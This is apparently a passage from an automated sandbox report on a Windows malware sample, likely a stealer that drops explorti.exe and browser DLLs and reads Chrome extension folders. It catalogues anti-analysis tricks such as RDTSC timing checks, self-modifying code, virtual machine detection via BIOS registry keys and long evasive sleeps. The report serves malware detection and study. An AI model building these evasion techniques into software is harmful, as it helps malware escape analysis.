00007FC9D8BCC175h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30BCE second address: 4D30BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C2A second address: 4D30C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C2F second address: 4D30C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D915F4C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C4B second address: 4D30C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C4F second address: 4D30C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a mov dl, 74h 0x0000000c mov si, CE05h 0x00000010 popad 0x00000011 mov esp, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC9D915F4C7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C7B second address: 4D30C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC174h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C93 second address: 4D30C97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30C97 second address: 4D30CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30CA6 second address: 4D30CAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30CAC second address: 4D30CB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30CB2 second address: 4D30CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40CBB second address: 4D40D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007FC9D8BCC177h 0x0000000c add ecx, 5A27DCFEh 0x00000012 jmp 00007FC9D8BCC179h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007FC9D8BCC171h 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FC9D8BCC16Eh 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a push ecx 0x0000002b mov cx, di 0x0000002e pop edi 0x0000002f pushfd 0x00000030 jmp 00007FC9D8BCC176h 0x00000035 and ax, 1588h 0x0000003a jmp 00007FC9D8BCC16Bh 0x0000003f popfd 0x00000040 popad 0x00000041 pop ebp 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 mov dx, 81F6h 0x00000049 movsx edi, si 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40D5A second address: 4D40D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40D60 second address: 4D40D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40AB8 second address: 4D40AD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov cl, C8h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC9D915F4C2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DC0557 second address: 4DC055D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB09C6 second address: 4DB09CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB083D second address: 4DB0843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0843 second address: 4DB0878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, D76Fh 0x00000007 pushfd 0x00000008 jmp 00007FC9D915F4C4h 0x0000000d sbb ah, FFFFFF98h 0x00000010 jmp 00007FC9D915F4BBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0878 second address: 4DB0880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0880 second address: 4DB0886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0886 second address: 4DB088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB088A second address: 4DB088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB088E second address: 4DB08D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FC9D8BCC16Dh 0x00000011 pop esi 0x00000012 pushfd 0x00000013 jmp 00007FC9D8BCC171h 0x00000018 or si, 0696h 0x0000001d jmp 00007FC9D8BCC171h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D500F1 second address: 4D50115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50115 second address: 4D50128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50128 second address: 4D50191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC9D915F4C1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FC9D915F4C3h 0x00000019 and si, F00Eh 0x0000001e jmp 00007FC9D915F4C9h 0x00000023 popfd 0x00000024 mov edx, esi 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50191 second address: 4D501AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC178h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D501AD second address: 4D501F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushad 0x0000000f mov si, F301h 0x00000013 push ecx 0x00000014 pop edi 0x00000015 popad 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC9D915F4C0h 0x00000021 adc si, 8348h 0x00000026 jmp 00007FC9D915F4BBh 0x0000002b popfd 0x0000002c movzx eax, dx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C11 second address: 4DB0C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C15 second address: 4DB0C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C2C second address: 4DB0C5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC9D8BCC16Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C5F second address: 4DB0C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C63 second address: 4DB0C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C69 second address: 4DB0C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C6F second address: 4DB0C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C73 second address: 4DB0D09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e mov bx, cx 0x00000011 pushfd 0x00000012 jmp 00007FC9D915F4C6h 0x00000017 and esi, 6EBEFA18h 0x0000001d jmp 00007FC9D915F4BBh 0x00000022 popfd 0x00000023 popad 0x00000024 mov ch, 0Dh 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007FC9D915F4BBh 0x0000002e push dword ptr [ebp+0Ch] 0x00000031 jmp 00007FC9D915F4C6h 0x00000036 push dword ptr [ebp+08h] 0x00000039 jmp 00007FC9D915F4C0h 0x0000003e push 14D8F9B9h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FC9D915F4BCh 0x0000004a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0D09 second address: 4DB0D4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 pushfd 0x00000006 jmp 00007FC9D8BCC16Dh 0x0000000b xor si, CE76h 0x00000010 jmp 00007FC9D8BCC171h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xor dword ptr [esp], 14D9F9BBh 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC9D8BCC16Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0D4C second address: 4DB0D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D915F4BCh 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Special instruction interceptor: First address: A5E910 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Special instruction interceptor: First address: BFED8B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Special instruction interceptor: First address: C29F57 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Special instruction interceptor: First address: C0E799 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Special instruction interceptor: First address: C86DD2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: E7E910 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 101ED8B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 1049F57 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 102E799 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 10A6DD2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Special instruction interceptor: First address: D0EA73 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Special instruction interceptor: First address: EACDEC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Special instruction interceptor: First address: EACADA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Special instruction interceptor: First address: ED5B9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Special instruction interceptor: First address: F3DF44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Special instruction interceptor: First address: 89E910 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Special instruction interceptor: First address: A3ED8B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Special instruction interceptor: First address: A69F57 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Special instruction interceptor: First address: A4E799 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Special instruction interceptor: First address: AC6DD2 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

Code function: 2_2_04DB0C09 rdtsc

2_2_04DB0C09

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 3203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1307	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 822	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 2586	Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window / User API: threadDelayed 412

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

API coverage: 8.2 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6856	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6856	Thread sleep time: -130065s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6916	Thread sleep count: 62 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6916	Thread sleep time: -124062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1828	Thread sleep count: 296 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1828	Thread sleep time: -8880000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1916	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1916	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5900	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5940	Thread sleep count: 63 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5940	Thread sleep time: -126063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2224	Thread sleep count: 3203 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2224	Thread sleep time: -6409203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2224	Thread sleep count: 1307 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2224	Thread sleep time: -2615307s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3468	Thread sleep count: 822 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3468	Thread sleep time: -1644822s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3468	Thread sleep count: 2586 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3468	Thread sleep time: -5174586s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe TID: 9100	Thread sleep count: 110 > 30
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe TID: 9100	Thread sleep time: -660000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	11_2_0040D8C0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_0040F4F0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	11_2_0040BCB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	11_2_004139B0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	11_2_0040E270
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_00401710
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_004143F0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_0040DC50
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	11_2_00414050
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	11_2_0040EB60
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	11_2_004133C0

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_00401160 GetSystemInfo,ExitProcess,

11_2_00401160

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

